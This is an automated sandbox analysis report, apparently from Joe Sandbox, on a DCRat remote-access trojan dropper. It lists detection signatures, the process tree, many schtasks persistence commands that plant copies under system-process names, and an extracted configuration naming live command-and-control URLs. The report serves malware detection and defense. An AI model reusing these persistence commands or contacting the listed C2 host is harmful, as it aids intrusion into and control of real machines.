Windows Analysis Report
hx1hwVZIjy.exe

Overview

General Information

Sample name: hx1hwVZIjy.exe (renamed because original name is a hash value)
Original sample name: 48e5ef4a0ca234c29ceecab25fe23d91.exe
Analysis ID: 1428549
MD5: 48e5ef4a0ca234c29ceecab25fe23d91
SHA1: 058fec1d069ba2dd6f7ef3af7ff65066b5b9f7b9
SHA256: 0641afd15fce62b273a73f7c8df67b4f192c4056ec788937d6d52a2e814c2ddc
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • hx1hwVZIjy.exe (PID: 4592 cmdline: "C:\Users\user\Desktop\hx1hwVZIjy.exe" MD5: 48E5EF4A0CA234C29CEECAB25FE23D91)
    • wscript.exe (PID: 6396 cmdline: "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3168 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • brokercrt.exe (PID: 2464 cmdline: "C:\ReviewHost\brokercrt.exe" MD5: 96B975481850ADD8CCB0353227ECEB87)
          • schtasks.exe (PID: 5996 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2700 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5896 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5528 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6008 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3140 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3872 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2668 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5948 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6556 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\WinStore.App.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6532 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4208 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 5 /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2436 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2452 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4220 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4320 cmdline: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3528 cmdline: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4164 cmdline: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6052 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3624 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6252 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4768 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Recovery\smss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5516 cmdline: schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7044 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5036 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1264 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6332 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1088 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4592 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1436 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3176 cmdline: schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6536 cmdline: schtasks.exe /create /tn "cscript" /sc ONLOGON /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2104 cmdline: schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • AFKwztugVSPq.exe (PID: 2828 cmdline: "C:\Users\Default User\Recent\AFKwztugVSPq.exe" MD5: 96B975481850ADD8CCB0353227ECEB87)
  • AFKwztugVSPq.exe (PID: 7084 cmdline: C:\Users\Public\Videos\AFKwztugVSPq.exe MD5: 96B975481850ADD8CCB0353227ECEB87)
  • cleanup
{"SCRT": "{\"6\":\"@\",\"F\":\")\",\"h\":\"$\",\"k\":\"&\",\"i\":\"!\",\"I\":\"^\",\"1\":\"#\",\"e\":\"_\",\"W\":\"*\",\"0\":\"~\",\"C\":\"(\",\"J\":\"|\",\"c\":\",\",\"D\":\";\",\"S\":\"-\",\"L\":\"`\",\"5\":\".\",\"X\":\"<\",\"B\":\">\",\"o\":\" \",\"V\":\"%\"}", "PCRT": "{\"c\":\"`\",\"p\":\"@\",\"b\":\"#\",\"w\":\",\",\"Q\":\"%\",\"S\":\"*\",\"D\":\"$\",\"I\":\"!\",\"i\":\">\",\"x\":\")\",\"X\":\"<\",\"M\":\"&\",\"l\":\"|\",\"y\":\"_\",\"f\":\" \",\"j\":\".\",\"0\":\"~\",\"=\":\"-\",\"e\":\"^\",\"6\":\"(\"}", "TAG": "", "MUTEX": "DCR_MUTEX-eLPnwKR5eZjrErjCXdn5", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0945069.xsph.ru/@==gbJBzYuFDT", "H2": "http://a0945069.xsph.ru/@==gbJBzYuFDT", "T": "0"}
Source | Rule | Description | Author | Strings
00000023.00000002.2214435641.0000000002531000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000023.00000002.2214435641.0000000002527000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000002.2112725978.0000000003397000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000025.00000002.2214490270.0000000002B01000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

            System Summary

            Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Default User\Recent\AFKwztugVSPq.exe", CommandLine: "C:\Users\Default User\Recent\AFKwztugVSPq.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\Default User\Recent\AFKwztugVSPq.exe", ProcessId: 2828, ProcessName: AFKwztugVSPq.exe
            Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\ReviewHost\brokercrt.exe, ProcessId: 2464, TargetFilename: C:\ReviewHost\conhost.exe
            Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f, CommandLine: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ReviewHost\brokercrt.exe", ParentImage: C:\ReviewHost\brokercrt.exe, ParentProcessId: 2464, ParentProcessName: brokercrt.exe, ProcessCommandLine: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f, ProcessId: 6052, ProcessName: schtasks.exe
            Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\hx1hwVZIjy.exe", ParentImage: C:\Users\user\Desktop\hx1hwVZIjy.exe, ParentProcessId: 4592, ParentProcessName: hx1hwVZIjy.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" , ProcessId: 6396, ProcessName: wscript.exe

            Persistence and Installation Behavior

            Source: Process started; Author: Joe Security; Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ReviewHost\brokercrt.exe", ParentImage: C:\ReviewHost\brokercrt.exe, ParentProcessId: 2464, ParentProcessName: brokercrt.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f, ProcessId: 5528, ProcessName: schtasks.exe
            Timestamp: 04/19/24-07:38:11.754913
            SID: 2850862
            Source Port: 80
            Destination Port: 49704
            Protocol: TCP
            Classtype: A Network Trojan was detected


            AV Detection

            Source: hx1hwVZIjy.exe; Avira: detected
            Source: C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe; Avira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Windows\Containers\serviced\wininit.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ReviewHost\brokercrt.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\smss.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\bWPufSNCBJ.bat; Avira: detection malicious, Label: BAT/Delbat.C
            Source: C:\ReviewHost\conhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Default\WinStore.App.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ReviewHost\RuntimeBroker.exe; Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: 00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"6\":\"@\",\"F\":\")\",\"h\":\"$\",\"k\":\"&\",\"i\":\"!\",\"I\":\"^\",\"1\":\"#\",\"e\":\"_\",\"W\":\"*\",\"0\":\"~\",\"C\":\"(\",\"J\":\"|\",\"c\":\",\",\"D\":\";\",\"S\":\"-\",\"L\":\"`\",\"5\":\".\",\"X\":\"<\",\"B\":\">\",\"o\":\" \",\"V\":\"%\"}", "PCRT": "{\"c\":\"`\",\"p\":\"@\",\"b\":\"#\",\"w\":\",\",\"Q\":\"%\",\"S\":\"*\",\"D\":\"$\",\"I\":\"!\",\"i\":\">\",\"x\":\")\",\"X\":\"<\",\"M\":\"&\",\"l\":\"|\",\"y\":\"_\",\"f\":\" \",\"j\":\".\",\"0\":\"~\",\"=\":\"-\",\"e\":\"^\",\"6\":\"(\"}", "TAG": "", "MUTEX": "DCR_MUTEX-eLPnwKR5eZjrErjCXdn5", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0945069.xsph.ru/@==gbJBzYuFDT", "H2": "http://a0945069.xsph.ru/@==gbJBzYuFDT", "T": "0"}
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe; ReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe; Virustotal: Detection: 78%
            Source: C:\Recovery\smss.exe; ReversingLabs: Detection: 87%
            Source: C:\Recovery\smss.exe; Virustotal: Detection: 78%
            Source: C:\ReviewHost\AFKwztugVSPq.exe; ReversingLabs: Detection: 87%
            Source: C:\ReviewHost\AFKwztugVSPq.exe; Virustotal: Detection: 78%
            Source: C:\ReviewHost\RuntimeBroker.exe; ReversingLabs: Detection: 87%
            Source: C:\ReviewHost\RuntimeBroker.exe; Virustotal: Detection: 78%
            Source: C:\ReviewHost\brokercrt.exe; ReversingLabs: Detection: 87%
            Source: C:\ReviewHost\brokercrt.exe; Virustotal: Detection: 78%
            Source: C:\ReviewHost\conhost.exe; ReversingLabs: Detection: 87%
            Source: C:\ReviewHost\conhost.exe; Virustotal: Detection: 78%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe; ReversingLabs: Detection: 87%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe; Virustotal: Detection: 78%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe; ReversingLabs: Detection: 87%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe; Virustotal: Detection: 78%
            Source: C:\Users\Default\WinStore.App.exe; ReversingLabs: Detection: 87%
            Source: C:\Users\Default\WinStore.App.exe; Virustotal: Detection: 78%
            Source: C:\Users\Public\AFKwztugVSPq.exe; ReversingLabs: Detection: 87%
            Source: C:\Users\Public\AFKwztugVSPq.exe; Virustotal: Detection: 78%
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe; ReversingLabs: Detection: 87%
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe; Virustotal: Detection: 78%
            Source: C:\Users\user\AFKwztugVSPq.exe; ReversingLabs: Detection: 87%
            Source: C:\Users\user\AFKwztugVSPq.exe; Virustotal: Detection: 78%
            Source: C:\Windows\Containers\serviced\wininit.exe; ReversingLabs: Detection: 87%
            Source: C:\Windows\Containers\serviced\wininit.exe; Virustotal: Detection: 78%
            Source: hx1hwVZIjy.exe; Virustotal: Detection: 61%
            Source: hx1hwVZIjy.exe; ReversingLabs: Detection: 73%
            Source: C:\Windows\Containers\serviced\wininit.exe; Joe Sandbox ML: detected
            Source: C:\ReviewHost\brokercrt.exe; Joe Sandbox ML: detected
            Source: C:\Recovery\smss.exe; Joe Sandbox ML: detected
            Source: C:\ReviewHost\conhost.exe; Joe Sandbox ML: detected
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe; Joe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe; Joe Sandbox ML: detected
            Source: C:\Users\Default\WinStore.App.exe; Joe Sandbox ML: detected
            Source: C:\ReviewHost\RuntimeBroker.exe; Joe Sandbox ML: detected
            Source: hx1hwVZIjy.exe; Joe Sandbox ML: detected
            Source: hx1hwVZIjy.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: hx1hwVZIjy.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hx1hwVZIjy.exe
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: 0_2_00F3A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: 0_2_00F4B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: 0_2_00F5AAA8 FindFirstFileExA
            Source: C:\ReviewHost\brokercrt.exe; File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\ReviewHost\brokercrt.exe; File opened: C:\Users\user
            Source: C:\ReviewHost\brokercrt.exe; File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\ReviewHost\brokercrt.exe; File opened: C:\Users\user\AppData
            Source: C:\ReviewHost\brokercrt.exe; File opened: C:\Users\user\AppData\Local
            Source: C:\ReviewHost\brokercrt.exe; File opened: C:\Users\user\Desktop\desktop.ini

            Networking

            Source: Traffic; Snort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 141.8.192.217:80 -> 192.168.2.5:49704
            Source: Malware configuration extractor; URLs: http://a0945069.xsph.ru/@==gbJBzYuFDT
            Source: brokercrt.exe, 00000005.00000002.2112725978.00000000033BA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: 0_2_00F3718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
            Source: C:\ReviewHost\brokercrt.exe; File created: C:\Windows\Containers\serviced\wininit.exe
            Source: C:\ReviewHost\brokercrt.exe; File created: C:\Windows\Containers\serviced\56085415360792
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: String function: 00F4ED00 appears 31 times
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: String function: 00F4E360 appears 52 times
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: String function: 00F4E28C appears 35 times
            Source: brokercrt.exe.0.dr; Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: AFKwztugVSPq.exe.5.dr; Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: hx1hwVZIjy.exe, 00000000.00000003.1988768555.000000000759D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilename libGLESv2.dll4 vs hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exe, 00000000.00000003.1988092710.0000000006C8A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilename libGLESv2.dll4 vs hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exe, 00000000.00000003.1989191246.0000000007598000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilename libGLESv2.dll4 vs hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exe; Binary or memory string: OriginalFilename libGLESv2.dll4 vs hx1hwVZIjy.exe
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Uy48Bwq9FymnVapyP1i.cs; Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, H04jjeMoCO4LqIxl6lq.cs; Cryptographic APIs: 'TransformBlock'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, H04jjeMoCO4LqIxl6lq.cs; Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, Uy48Bwq9FymnVapyP1i.cs; Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, H04jjeMoCO4LqIxl6lq.cs; Cryptographic APIs: 'TransformBlock'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, H04jjeMoCO4LqIxl6lq.cs; Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, hkPU9DF7lvaIiDDnQnm.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, hkPU9DF7lvaIiDDnQnm.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, hkPU9DF7lvaIiDDnQnm.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, hkPU9DF7lvaIiDDnQnm.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine; Classification label: mal100.troj.evad.winEXE@45/31@0/0
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: 0_2_00F36EC9 GetLastError,FormatMessageW
